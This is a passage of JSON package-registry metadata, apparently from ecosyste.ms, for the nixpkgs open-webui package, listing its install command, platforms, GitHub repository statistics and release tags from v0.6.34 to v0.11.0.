packages_count":6484},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-09-03T05:02:04.435Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":13066725,"name":"open-webui","ecosystem":"nixpkgs","description":"Comprehensive suite for LLMs with a user-friendly WebUI","homepage":"https://github.com/open-webui/open-webui","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/open-webui/open-webui","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:09:44.644Z","latest_release_published_at":"2026-02-01T17:09:44.644Z","latest_release_number":"0.3.35","last_synced_at":"2026-08-09T13:09:47.779Z","created_at":"2026-02-01T17:09:43.851Z","updated_at":"2026-08-22T23:24:07.810Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=open-webui","install_command":"nix-env -iA nixpkgs.open-webui","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/by-name/op/open-webui/package.nix#L147","metadata":{"nix_attribute":"open-webui-0.3.35","position":"pkgs/by-name/op/open-webui/package.nix:147","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"]},"repo_metadata":{"id":199152863,"uuid":"701547123","full_name":"open-webui/open-webui","owner":"open-webui","description":"User-friendly AI Interface (Supports Ollama, OpenAI API, ...)","archived":false,"fork":false,"pushed_at":"2026-08-22T13:13:14.000Z","size":409036,"stargazers_count":149582,"open_issues_count":326,"forks_count":21818,"subscribers_count":651,"default_branch":"main","last_synced_at":"2026-08-22T19:45:51.996Z","etag":null,"topics":["ai","llm","llm-ui","llm-webui","llms","mcp","ollama","ollama-webui","open-webui","openai","openapi","rag","self-hosted","ui","webui"],"latest_commit_sha":null,"homepage":"https://openwebui.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/open-webui.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"docs/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":"CONTRIBUTOR_LICENSE_AGREEMENT","disclosure":null},"funding":{"github":"open-webui"}},"created_at":"2023-10-06T22:08:27.000Z","updated_at":"2026-08-22T19:12:28.000Z","dependencies_parsed_at":"2026-08-15T05:21:06.356Z","dependency_job_id":null,"html_url":"https://github.com/open-webui/open-webui","commit_stats":{"total_commits":4572,"total_committers":249,"mean_commits":18.36144578313253,"dds":0.3506124234470691,"last_synced_commit":"1d225dd804575af9ae5981528dfdce695f7f7040"},"previous_names":["ollama-webui/ollama-webui","open-webui/open-webui"],"tags_count":167,"template":false,"template_full_name":null,"purl":"pkg:github/open-webui/open-webui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36835287,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"open-webui","name":"Open WebUI","uuid":"158137808","kind":"organization","description":"On a mission to build the best AI user interface.","email":"support@openwebui.com","website":"https://openwebui.com","location":null,"twitter":"OpenWebUI","company":null,"icon_url":"https://avatars.githubusercontent.com/u/158137808?v=4","repositories_count":25,"last_synced_at":"2026-08-22T19:45:41.038Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/open-webui","funding_links":["https://github.com/sponsors/open-webui"],"total_stars":164651,"followers":5228,"following":0,"created_at":"2024-02-17T08:24:26.070Z","updated_at":"2026-08-22T19:45:41.055Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui/repositories"},"tags":[{"name":"v0.11.0","sha":"f9590b8017199e56d5e953657e6498e3cef1d246","kind":"commit","published_at":"2026-07-27T09:30:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.11.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"ecd48e2f718220a6400ecf49eafd4867a38feb10","kind":"commit","published_at":"2026-07-01T08:40:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"b711935dd57dbc223ebbf410175a8bbe7e4efafb","kind":"commit","published_at":"2026-06-29T19:38:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"4d2e13cf2bcc451b33bb6374bea4d2163e6cc94c","kind":"commit","published_at":"2026-06-29T19:17:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0/manifests"},{"name":"v0.9.6","sha":"1a97751e376e00a1897bc3679215ae1c7bd8fd42","kind":"commit","published_at":"2026-06-02T02:09:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"3660bc00fd807deced3400a63bfa6db47811a3bb","kind":"commit","published_at":"2026-05-10T18:13:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"f51d2b026f1b0e7283b15f093412be8b67d24770","kind":"commit","published_at":"2026-05-09T07:50:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"adc9076d176679fd913c5dc44d0bd4d8f86d1fc3","kind":"commit","published_at":"2026-05-09T07:17:07.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"8dae237a0bfdac4b7f55b463b3e2769ea4b94a0b","kind":"commit","published_at":"2026-04-24T09:56:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"0a8a620fb6fd4c914494f56ac06475bd5f95a985","kind":"commit","published_at":"2026-04-21T10:45:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"f31768e20e5c6b4f6da0ef657877298b359936cf","kind":"commit","published_at":"2026-04-21T07:56:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0/manifests"},{"name":"v0.8.12","sha":"9bd84258d09eefe7bf975878fb0e31a5dadfe0f8","kind":"commit","published_at":"2026-03-27T00:26:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12/manifests"},{"name":"v0.8.11","sha":"4d058a125b17eb57212af5eab98d683548d546e3","kind":"commit","published_at":"2026-03-25T22:49:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11/manifests"},{"name":"v0.8.10","sha":"e4e69a10ec08a725bf2ab3db499ef664f2bd7570","kind":"commit","published_at":"2026-03-09T00:09:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10/manifests"},{"name":"v0.8.9","sha":"6c159a97b7efdfdbfa262ebd26823a2d695b561d","kind":"commit","published_at":"2026-03-08T02:56:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9/manifests"},{"name":"v0.8.8","sha":"79f04379801622181ef9c591374a285eac4e1c4d","kind":"commit","published_at":"2026-03-02T23:32:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8/manifests"},{"name":"v0.8.7","sha":"6137f7cb7ecda49d5fa6857c5e9fa8942dda6b23","kind":"commit","published_at":"2026-03-02T01:14:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7/manifests"},{"name":"v0.8.6","sha":"9c9a18d6d4311ff246d5d1345d94581bf25c604b","kind":"commit","published_at":"2026-03-01T21:03:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"1ac3dd4a893e13803e7b889611303c4a7a5cc470","kind":"commit","published_at":"2026-02-23T09:26:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"2ed3055c42ae18e3372081c18629963b0e244a62","kind":"commit","published_at":"2026-02-23T07:58:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"b8112d72b95e480f946f0688bed29321b61e65af","kind":"commit","published_at":"2026-02-17T07:25:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"7c7fe443289c3d0307ebbcf320fb1d895c3ee79b","kind":"commit","published_at":"2026-02-16T07:37:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"883f1dda0f18fbe26aca7aed5a8804021a3685ca","kind":"commit","published_at":"2026-02-14T00:04:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"7a7a25766c3dc13fa85544a93d011e00b7c0b2b4","kind":"commit","published_at":"2026-02-12T23:42:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0/manifests"},{"name":"v0.7.2","sha":"2b26355002064228e9b671339f8f3fb9d1fafa73","kind":"commit","published_at":"2026-01-10T21:00:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"f2a360cb87cc395a0195e1b57ff7272400db3bee","kind":"commit","published_at":"2026-01-09T20:57:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"6adde203cd292a9e3af9c64a2ae36b603fed096a","kind":"commit","published_at":"2026-01-09T18:51:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0/manifests"},{"name":"v0.6.43","sha":"a7271532f8a38da46785afcaa7e65f9a45e7d753","kind":"commit","published_at":"2025-12-22T06:03:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.43","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43/manifests"},{"name":"v0.6.42","sha":"d95f533214e3fe5beb5e41ec1f349940bc4c7043","kind":"commit","published_at":"2025-12-21T21:08:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.42","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42/manifests"},{"name":"v0.6.41","sha":"6f1486ffd0cb288d0e21f41845361924e0d742b3","kind":"commit","published_at":"2025-12-02T22:28:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.41","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41/manifests"},{"name":"v0.6.40","sha":"140605e660b8186a7d5c79fb3be6ffb147a2f498","kind":"commit","published_at":"2025-11-25T11:01:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.40","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40/manifests"},{"name":"v0.6.39","sha":"9899293f050ad50ae12024cbebee7e018acd851e","kind":"commit","published_at":"2025-11-25T10:31:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.39","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39/manifests"},{"name":"v0.6.38","sha":"e3faec62c58e3a83d89aa3df539feacefa125e0c","kind":"commit","published_at":"2025-11-24T12:00:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.38","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38/manifests"},{"name":"v0.6.37","sha":"fe6783c16699911c7be17392596d579333fb110c","kind":"commit","published_at":"2025-11-24T03:10:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.37","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37/manifests"},{"name":"v0.6.36","sha":"e0d5de16978786b8a7538adf1efcde5258f38faf","kind":"commit","published_at":"2025-11-06T21:45:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.36","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36/manifests"},{"name":"v0.6.35","sha":"e85c7f79310f351672fe967a102396b6f3f5e88b","kind":"commit","published_at":"2025-11-06T18:40:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35/manifests"},{"name":"v0.6.34","sha":"9ae06a3cac140673cb93895bab37846095e71059","kind":"commit","published_at":"2025-10-16T16:55:47.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.34","dependencies_parsed_at":null,"dependency_job_id":n